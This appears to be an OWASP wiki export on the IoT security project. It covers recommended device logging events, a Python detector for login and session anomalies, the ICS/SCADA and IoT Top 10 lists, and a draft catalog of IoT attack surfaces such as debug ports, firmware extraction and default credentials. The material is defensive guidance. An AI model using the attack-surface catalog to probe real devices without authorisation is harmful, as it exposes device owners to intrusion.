= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum set of IoT device logging events. It covers many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
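As an added example, not the project's own code, the following Python sketch shows how a device or gateway could derive several of the events listed above from raw login and request records and emit them as structured JSON log lines: "Multiple Failed Passwords", "High Rate of Login Attempts", "Device Accessed Using Default Administrative Credentials" and "Source Location Changes During Session". The thresholds, record format and activity stream are constructed for illustration.<br />

```python
import json
from collections import defaultdict, deque

# Thresholds are constructed for this example; tune them per deployment.
FAILED_PASSWORD_LIMIT = 5     # failures for one account ...
FAILED_PASSWORD_WINDOW = 60   # ... within this many seconds
LOGIN_RATE_LIMIT = 10         # attempts from one source address ...
LOGIN_RATE_WINDOW = 10        # ... within this many seconds


class IoTEventLogger:
    """Derives the recommended IoT logging events from raw device activity records."""

    def __init__(self):
        self.failures = defaultdict(deque)  # account -> timestamps of failed logins
        self.attempts = defaultdict(deque)  # source  -> timestamps of any login attempt
        self.sessions = {}                  # session id -> source address at login
        self.events = []

    def _emit(self, category, event, record, **extra):
        entry = {"ts": record["ts"], "category": category, "event": event,
                 "device": record["device"], "src": record["src"], **extra}
        self.events.append(entry)

    @staticmethod
    def _count_in_window(times, now, window):
        """Append `now` to a deque of timestamps and drop entries outside the window."""
        times.append(now)
        while times and now - times[0] > window:
            times.popleft()
        return len(times)

    def login(self, record):
        """Process one login attempt; fires each threshold event once when it is reached."""
        user, src, now = record["user"], record["src"], record["ts"]
        if self._count_in_window(self.attempts[src], now, LOGIN_RATE_WINDOW) == LOGIN_RATE_LIMIT:
            self._emit("Authentication Exceptions", "High Rate of Login Attempts", record,
                       attempts=LOGIN_RATE_LIMIT, window_s=LOGIN_RATE_WINDOW)
        if record["result"] != "success":
            if self._count_in_window(self.failures[user], now, FAILED_PASSWORD_WINDOW) == FAILED_PASSWORD_LIMIT:
                self._emit("Authentication Exceptions", "Multiple Failed Passwords", record,
                           user=user, failures=FAILED_PASSWORD_LIMIT, window_s=FAILED_PASSWORD_WINDOW)
            return
        self.failures.pop(user, None)  # a successful login resets the failure counter
        if record.get("default_credential"):
            # The device itself knows whether the admin account still has its factory password.
            self._emit("Administrative Mode Events",
                       "Device Accessed Using Default Administrative Credentials", record, user=user)
        self.sessions[record["session"]] = src

    def request(self, record):
        """Process one in-session request; flags a session that moves to another source."""
        original = self.sessions.get(record["session"])
        if original is not None and original != record["src"]:
            self._emit("Session Exceptions", "Source Location Changes During Session", record,
                       session=record["session"], original_src=original)

    def process(self, records):
        """Run all records through the detector and return the events as JSON log lines."""
        for record in records:
            if record["kind"] == "login":
                self.login(record)
            elif record["kind"] == "request":
                self.request(record)
        return [json.dumps(e, sort_keys=True) for e in self.events]


def _login(ts, user, src, result, **extra):
    return {"kind": "login", "ts": ts, "device": "cam-01", "user": user, "src": src,
            "result": result, **extra}


# Constructed activity stream; the addresses are documentation ranges, not real hosts.
SAMPLE_RECORDS = (
    # five wrong passwords for "admin" from one source within a minute
    [_login(1000 + i, "admin", "203.0.113.5", "fail") for i in range(5)]
    # ten attempts in ten seconds from one source, spread over many accounts
    + [_login(2000 + i, f"user{i}", "198.51.100.7", "fail") for i in range(10)]
    # a successful login that still used the factory default admin password
    + [_login(3000, "admin", "192.0.2.10", "success", session="s1", default_credential=True)]
    # the same session later appears from a different source address
    + [{"kind": "request", "ts": 3100, "device": "cam-01", "src": "192.0.2.10", "session": "s1"},
       {"kind": "request", "ts": 3200, "device": "cam-01", "src": "203.0.113.99", "session": "s1"}]
)


def run_sample():
    """Return the event dicts produced for the constructed stream."""
    logger = IoTEventLogger()
    logger.process(SAMPLE_RECORDS)
    return logger.events


if __name__ == "__main__":
    for line in IoTEventLogger().process(SAMPLE_RECORDS):
        print(line)
```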
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and companies that want to build such a program have few good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations; it is headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
* RSA Conference San Francisco, April 21, 2015: [https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project], Daniel Miessler, Practice Principal<br />
* DEF CON 23, August 6-9, 2015: [https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping], Daniel Miessler<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246182OWASP Internet of Things Project2018-12-19T23:41:17Z<p>Aaron.guzman: /* Philosophy */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: CSA IoT Controls Matrix, CTIA, Stanford’s Secure Internet of Things Project, NISTIR 8200, ENISA IoT Baseline Report, Code of Practice for Consumer IoT Security, and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
''The OWASP IoT Security Team, 2018''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's Slack channel first], then join the #iot-security channel within it.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physical)<br />
* Damage (Physical)<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
